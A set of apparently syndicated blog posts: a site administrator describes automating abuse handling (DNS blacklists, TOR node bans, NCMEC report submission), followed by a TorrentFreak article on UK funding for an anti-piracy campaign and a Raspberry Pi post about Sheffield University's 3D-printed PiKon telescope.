Recently I’ve been taking a closer look at some of the tasks we manually perform. Things like categorizing content for various research projects, identifying trends, scanning content for “new” features that run the gambit from new devices to new attacks, reviewing flagged content, and responding to user requests. A lot of these tasks are time consuming and performed more than once. And a few of them can be automated.

Blacklists
Network abuses come in many different forms. Users may upload prohibited content, automate submissions, attack the site with port scans and vulnerability tests, or submit comment-spam to our contact form. It’s always a good idea to check abusers against known blacklists. This tells me whether it is a wide-spread abuse or if my site is just special.

There are a bunch of servers that run DNS-based blacklists. They all work in similar ways:

  1. You encode the query as a hostname. Like “2.1.9.127.dnsbl.whatever”. This encodes the IP address in reverse-notation: 127.9.1.2.
  2. You perform a DNS hostname lookup.
  3. The DNS result encodes the response as an IP address. Different DNSBL servers have different encoded values, but they typically report suspicious behavior, known proxies, and spammer.

Some DNSBL servers seem too focused for my use. For example, if they only report known-spam systems and not proxies or malware, then it will rarely find a match for my non-spam queries. Other DNSBL systems seem to have dated content, with lists of proxies that have not been active for years. (One system will quickly add proxies but won’t remove them without a request. So dead proxies remain listed indefinitely.)

Most DNSBL servers focus on anti-spam. They report whether the address was used to send spam, harvest addresses, or other related actions. Ideally, I’d like a DNSBL that focuses on other hostile activities: network scanners, attackers, and proxies. But for now, looking for other abuses, like harvesters and comment-spam, is good enough.

Anonymous Proxies
I believe that anonymous proxies are important. They permit whistle-blowers to make anonymous reports and allow people to discuss personal issues without the fear of direct retribution. Groups like “Alcoholics Anonymous” would not be as successful if members had to be fully outed.

Unfortunately, anonymity also permits abuses. The new automated system downloads the list of TOR nodes daily. This allows us to easily check if a ban is tied to a TOR node. We don’t ban every TOR node. Instead, we only ban the nodes used for uploading prohibited content to the site.

For beginner TOR users, this may not make sense. Banning one node won’t stop the problem since the user will just change nodes. Except… Not all TOR nodes are equal. Nodes that can handle a higher load are given a higher weight and are more likely to carry traffic. We’ve only banned about 300 of the 6,100 TOR nodes, but that seems to have stopped most abuses from TOR. (And best yet: only about a dozen of these bans were manually performed — most were caught by our auto-ban system.)

Automating History
The newly automated system also scans the logs for own ban records and any actions made after being banned. I can tell if the network address is associated with network attacks or if the user just uploaded prohibited content. I can also tell if the user attempted to avoid the ban.

I recently had one person request a ban-removal. He claimed that he didn’t know why he was banned. After looking at the automated history report, I decided to leave the ban in place and not respond to him. But I was very tempted to write something like: “Dude… You were banned three seconds after you uploaded that picture. You saw the ban message that said to read the FAQ, and you read it twelve seconds later. Then you reloaded eight times, switched browsers, switched computers, and then tried to avoid the ban by changing your network address. And now you’re claiming that you don’t know why you were banned? Yeah, you’re still banned.”

Performing a full history search though the logs for information related to a ban used to take minutes. Now it takes one click.

NCMEC Reports
The word forensics means “relating to the use of scientific knowledge or methods in solving crimes” or “relating to, used in, or suitable to a court of law”. When you see a forensic system, you know it is geared toward crime detection and legal issues.

And people who deal in child exploitation photos know that their photos are illegal. Yet, some people are stupid enough to upload illegal pictures to FotoForensics.

The laws regarding these pictures are very explicit: we must report pictures related to child abuse and exploitation to the CyberTipline at the National Center for Missing and Exploited Children (NCMEC).

While I don’t mind the reporting requirement, I don’t like the report form. The current online form has dozens of fields and takes me more than 6 minutes to complete each time I need to submit a report. I need to gather the picture(s), information about the submitter, and other related log information. Some reports have a lot of files to attach, so they can take 12 minutes or more to complete. The total time I’ve spent using this form in the last year can be measured in days.

I’ve finally had enough of the manual submission process. I just spent a few days automating it from my side. It’s a PHP script that automatically logs in (for the session tokens), grabs the form (for the fields and any pre-populated values), fills out the data, attaches files, and submits it. It also automatically writes a short report (that I can edit with more information), records the confirmation information, and archives the stuff I am legally required to retain.

Instead of taking me 6+ minutes for each report, it now takes about 3 seconds. This simplifies the entire reporting process and significantly reduces the ick-factor.

Will Work for Work

A week of programming effort (spread over three weeks) has allowed me to reduce the overhead. Administrative tasks that would take a few hours each day now take minutes.

There’s still a good number of tasks that can be automated. This includes spotting certain types of pictures that are currently being included in specific research projects, and some automated classification. I can probably add in a little more automated NCMEC reporting, for those common cases where there is no need for a manually confirmation.

Eventually I will need to get a more powerful server and maybe bring on more help. But for right now, simply automating common tasks makes the current server very manageable.

TorrentFreak: UK Govt Hopes to ‘Profit’ From Anti-Piracy Measures

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

pirate-cardA few weeks ago the UK Government announced its support for a new anti-piracy plan, the Voluntary Copyright Alert Programme (VCAP).

The Government teamed up with copyright holders and ISPs, who will start sending warning emails to pirating Internet users next year. In addition there will be a broader educational campaign to steer people towards using legal options.

While the campaign is a private initiative the Government has decided to back it financially with several million pounds. However, TorrentFreak has learned that the Government funding wasn’t straightforward and was made outside of the available marketing budget.

Through a Freedom of Information request we obtained an email conversation between the UK Intellectual Property Office (IPO) and music industry group BPI. In the email from May this year IPO’s Ros Lynch explains that there are no regular marketing funds available to support VCAP.

“As part of the process of agreeing Government financial support for the educational element of VCAP we will need to seek a marketing exemption as we are currently not permitted to spend on marketing,” Lynch writes to BPI’s Ian Moss.

To be able to get the exception the Government needs additional information from the entertaining industries, showing that the investment makes sense financially. Or put differently, that the Government will see a good return for their invested taxpayer money.

“Essentially this will require a proper business case which includes hard figures,” Lynch writes.

“For example, what research are you basing your target audiences on? How have you calculated your 5% reduction in infringement? What £ saving does a 5% reduction bring? What overall estimate can you make of the ROI of this campaign e.g. what financial benefit would a £2.2m Government investment bring?”

ipoemail

The above suggests that the BPI is predicting a 5% drop in piracy from the anti-piracy measures. However, in a response to the IPO’s request the industry group writes that even with a lower success rate the Government’s spending will pay off.

In a “Summary Business Case” (pdf) BPI uses the expected VAT increase to convince the Government of the “profitability” of the campaign. It estimates that if 15% of all illegal downloads are lost sales, piracy only has to decline 1% over three years for the Government to recoup their investment.

“The underlying assumptions are based on very good data that has been produced by Ofcom and by a number of academic studies looking at the replacement ratios. It shows that only very small changes in piracy lead to significant returns to Government,” BPI notes.

The music industry group stresses that the calculation only looks at VAT income and that the effects on the wider economy may be even greater. However, the static model they presented should already be good enough to warrant the funding.

“So even from a very simple, static assumption, a small reduction in piracy of between .49% and 1% over the three years would return Government investment of £4m in an education scheme,” BPI writes.

This prediction was apparently good enough for the Government to invest in the new anti-piracy plans beyond the available marketing budget. Even more so, the authorities committed £3.5 million to the campaign, instead of the £2.2 that was discussed in May.

Whether the Government will indeed be able to recoup the taxpayer money through the anti-piracy campaign will be hard to measure, but the plan is going full steam ahead.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Raspberry Pi: PiKon and other Pi projects from Sheffield University

This post was syndicated from: Raspberry Pi and was written by: Ben Nuttall. Original post: at Raspberry Pi

Sheffield has been a maker city for many years – the thriving steel industry dates back to the 14th century. Today it has the likes of Pimoroni, who recently moved in to a huge new factory, making cases, HATs, media centres and more.

IMG_20140824_135803

The good ship Pimoroni

The University of Sheffield has been undertaking a number of Raspberry Pi projects in the last couple of years. The computer science department has a research group called Sheffield Pi-Tronics led by Hamish Cunningham. One project of note is their new Pi-powered telescope – PiKon. Not to be confused with PyCon

The £100 3D printed Pi-powered telescope

The University has released incredible images of the moon taken with the Raspberry Pi’s camera module connected to a 3D printed telescope which costs just £100 to make from readily available parts.

The moon

Moon, the

The Pikon astro-cam is a collaborative project by the Department of Physics at the University of Sheffield and Mark Wrigley of Alternative Photonics, a small company based in north Sheffield. The project was set up to deliver a working telescope for the Festival of the Mind event.

They have a working model and they’re aiming to make all the 3D printing resources and instructions available soon. They’re also looking for help producing a simple interface to make it more accessible to all:

So far, we have a working telescope which is operated by entering command lines into the Raspberry Pi. We are looking for enthusiasts and educators to help us take things further. We want to encourage people to create, innovate, educate and share their efforts on an open source basis.

pikonic.com

How it works (from pikonic.com):

visualtelescope2

The PiKon Telescope is based on the Newtonian Reflecting Telescope. This design uses a concave mirror (objective) to form an image which is examined using an eyepiece. The mirror is mounted in a tube and a 45 degree mirror is placed in the optical path to allow the image to be viewed from the side of the tube.

visualtelescope3The PiKon Telescope is based on a very similar design, but the image formed by the Objective is focused onto the photo sensor of a Raspberry Pi Camera. The camera sensor is exposed by simply removing (unscrewing) the lens on the Pi Camera. Because of the small size of the Raspberry Pi Camera board, it is possible to mount the assembly in the optical path. The amount of light lost by doing this is similar to the losses caused by mounting the 45 degree mirror in a conventional Newtonian design.

Former physicist and member of the Institute of Physics, Mark Wrigley, said:

We’ve called this project Disruptive Technology Astronomy because we hope it will be a game changer, just like all Disruptive Technologies.

We hope that one day this will be seen on a par with the famous Dobsonian ‘pavement’ telescopes, which allowed hobbyists to see into the night skies for the first time.

This is all about democratising technology, making it cheap and readily available to the general public.

And the PiKon is just the start. It is our aim to not only use the public’s feedback and participation to improve it, but also to launch new products which will be of value to people.

Also this week the group launched Pi Bank – a set of 20 kits containing Pi rigs that are available for short-term loan. This means local schools and other groups can make use of the kits for projects without having to invest in the technology themselves, with all the essentials, plenty of extra bits to play with – and experts on hand to help out.

pi-bank-stack

pi-bank-kit

See more of the Sheffield Pi-Tronics projects at pi.gate.ac.uk and read more about PiKon at pikonic.com

Any positive comments about Sheffield are completely biased as that’s where I’m from. If you’re interested in the history of Sheffield there’s a great documentary you should watch called The Full Monty.